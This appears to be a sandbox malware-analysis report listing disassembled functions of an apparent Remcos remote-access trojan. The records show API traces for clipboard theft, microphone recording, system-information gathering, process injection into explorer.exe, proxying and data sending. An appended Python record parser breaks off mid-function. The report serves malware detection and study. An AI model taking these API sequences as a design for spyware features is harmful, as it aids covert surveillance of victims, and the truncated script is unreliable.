                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                        • String ID:
                                        • API String ID: 2441525078-0
                                        • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                        • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                        • TranslateMessage.USER32(?), ref: 0040557E
                                        • DispatchMessageA.USER32(?), ref: 00405589
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 2956720200-749203953
                                        • Opcode ID: 64fc086ea25693d4c9e74b4bdb7fb32219071ce4127b145092e87943638d2e0e
                                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                        • Opcode Fuzzy Hash: 64fc086ea25693d4c9e74b4bdb7fb32219071ce4127b145092e87943638d2e0e
                                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                        APIs
                                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                        • String ID: 0VG$0VG$<$@$Temp
                                        • API String ID: 1704390241-2575729100
                                        • Opcode ID: 6f6b6ebf27fedb738aceabdcac13e206b780a78d8e5b152ac6f35e1b1749394a
                                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                        • Opcode Fuzzy Hash: 6f6b6ebf27fedb738aceabdcac13e206b780a78d8e5b152ac6f35e1b1749394a
                                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                        APIs
                                        • OpenClipboard.USER32 ref: 00416941
                                        • EmptyClipboard.USER32 ref: 0041694F
                                        • CloseClipboard.USER32 ref: 00416955
                                        • OpenClipboard.USER32 ref: 0041695C
                                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                        • CloseClipboard.USER32 ref: 00416984
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                        • String ID: !D@
                                        • API String ID: 2172192267-604454484
                                        • Opcode ID: 09e40c178438f861953ad73b4319b12bb04aeac0026907326ee2fa957add1598
                                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                        • Opcode Fuzzy Hash: 09e40c178438f861953ad73b4319b12bb04aeac0026907326ee2fa957add1598
                                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                        APIs
                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                        • CloseHandle.KERNEL32(?), ref: 00413465
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                        • String ID:
                                        • API String ID: 297527592-0
                                        • Opcode ID: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                        • Opcode Fuzzy Hash: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                        • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                        APIs
                                        • _free.LIBCMT ref: 00448135
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00448141
                                        • _free.LIBCMT ref: 0044814C
                                        • _free.LIBCMT ref: 00448157
                                        • _free.LIBCMT ref: 00448162
                                        • _free.LIBCMT ref: 0044816D
                                        • _free.LIBCMT ref: 00448178
                                        • _free.LIBCMT ref: 00448183
                                        • _free.LIBCMT ref: 0044818E
                                        • _free.LIBCMT ref: 0044819C
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Eventinet_ntoa
                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                        • API String ID: 3578746661-3604713145
                                        • Opcode ID: 62c1f3fe3af975eef78232181f6e592caace1332abd3bb8fd32521eabcae62ef
                                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                        • Opcode Fuzzy Hash: 62c1f3fe3af975eef78232181f6e592caace1332abd3bb8fd32521eabcae62ef
                                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                        APIs
                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DecodePointer
                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                        • API String ID: 3527080286-3064271455
                                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        • Sleep.KERNEL32(00000064), ref: 00417521
                                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: File$CreateDeleteExecuteShellSleep
                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                        • API String ID: 1462127192-2001430897
                                        • Opcode ID: 1573face9f48aa7ca9f90e6055c45cba110577aa5dfdbe0b4be733a29c62012b
                                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                        • Opcode Fuzzy Hash: 1573face9f48aa7ca9f90e6055c45cba110577aa5dfdbe0b4be733a29c62012b
                                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe), ref: 0040749E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: CurrentProcess
                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                        • API String ID: 2050909247-4242073005
                                        • Opcode ID: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
                                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                        • Opcode Fuzzy Hash: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
                                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                        APIs
                                        • _strftime.LIBCMT ref: 00401D50
                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                        • API String ID: 3809562944-243156785
                                        • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                        • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                        • int.LIBCPMT ref: 00410E81
                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                        • String ID: ,kG$0kG
                                        • API String ID: 3815856325-2015055088
                                        • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                        • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                        APIs
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                        • waveInStart.WINMM ref: 00401CFE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                        • String ID: dMG$|MG$PG
                                        • API String ID: 1356121797-532278878
                                        • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                        • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                          • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                          • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                        • TranslateMessage.USER32(?), ref: 0041D4E9
                                        • DispatchMessageA.USER32(?), ref: 0041D4F3
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                        • String ID: Remcos
                                        • API String ID: 1970332568-165870891
                                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                        • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                        • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                        APIs
                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • _memcmp.LIBVCRUNTIME ref: 00445423
                                        • _free.LIBCMT ref: 00445494
                                        • _free.LIBCMT ref: 004454AD
                                        • _free.LIBCMT ref: 004454DF
                                        • _free.LIBCMT ref: 004454E8
                                        • _free.LIBCMT ref: 004454F4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: _free$ErrorLast$_abort_memcmp
                                        • String ID: C
                                        • API String ID: 1679612858-1037565863
                                        • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                        • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID:
                                        • String ID: tcp$udp
                                        • API String ID: 0-3725065008
                                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                        • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                        • ExitThread.KERNEL32 ref: 004018F6
                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                        • String ID: PkG$XMG$NG$NG
                                        • API String ID: 1649129571-3151166067
                                        • Opcode ID: 50019b23594c7f8594175c599cdc70c6a85fa80541799c81a7c64c19a659782b
                                        • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                        • Opcode Fuzzy Hash: 50019b23594c7f8594175c599cdc70c6a85fa80541799c81a7c64c19a659782b
                                        • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                        • String ID: .part
                                        • API String ID: 1303771098-3499674018
                                        • Opcode ID: d529a156e2d4aa638270efb6cac6cc48bb231fa92e7fccec4ec34662e1436a09
                                        • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                        • Opcode Fuzzy Hash: d529a156e2d4aa638270efb6cac6cc48bb231fa92e7fccec4ec34662e1436a09
                                        • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
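The records above (the dxdiag system-information collector, the waveIn audio recorder and the .part downloader among them) all share the same Joe Sandbox IDA-plugin record layout: API bullets with an optional "Part of subcall function" prefix, a "$"-separated String ID, and an Instruction Fuzzy Hash bullet that closes the record. The following Python is an added example for this report, not Joe Sandbox code: it parses that layout into structured records and tags each function with the capability its API and string evidence implies. The capability rules are this example's own heuristics, and SAMPLE is an abbreviated copy of three records from the listing above, embedded so the script runs offline.

```python
"""Parse Joe Sandbox IDA-plugin function records into structured data and tag
each function with an inferred capability.  Added example for this report,
not Joe Sandbox code; the capability rules below are assumptions of this
example and SAMPLE is an abbreviated copy of three records from the listing."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# API bullet: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional "(args)", then "ref: XXXXXXXX".
API_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[\w:~@]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
# Any other "• Key: value" bullet (String ID, Instruction ID, Source File, ...).
FIELD_RE = re.compile(r"^(?:•\s*)?(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    parent: str | None = None  # address of the subcall that really makes the call


@dataclass
class FuncRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    @property
    def direct_apis(self) -> set[str]:
        """APIs the function calls itself; subcall evidence is excluded."""
        return {a.name for a in self.apis if a.parent is None}

    @property
    def label(self) -> str:
        return self.fields.get("Instruction ID", "?")[:12]


def parse_records(text: str) -> list[FuncRecord]:
    """A record ends at its 'Instruction Fuzzy Hash' bullet; bare section
    labels (APIs, Strings, Similarity, ...) carry no data and are skipped."""
    records: list[FuncRecord] = []
    cur = FuncRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
        elif m := FIELD_RE.match(line):
            key, val = m["key"], m["val"]
            if key == "String ID":
                cur.strings = [s for s in val.split("$") if s]  # '$' separates strings
            else:
                cur.fields[key] = val
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FuncRecord()
    return records


def capabilities(rec: FuncRecord) -> set[str]:
    """Heuristic capability tags (assumptions of this example), keyed on the
    function's own calls so a subcall's CreateFileW does not tag the caller."""
    apis, strs = rec.direct_apis, set(rec.strings)
    tags: set[str] = set()
    if "ShellExecuteW" in apis and {"dxdiag", "\\sysinfo.txt"} <= strs:
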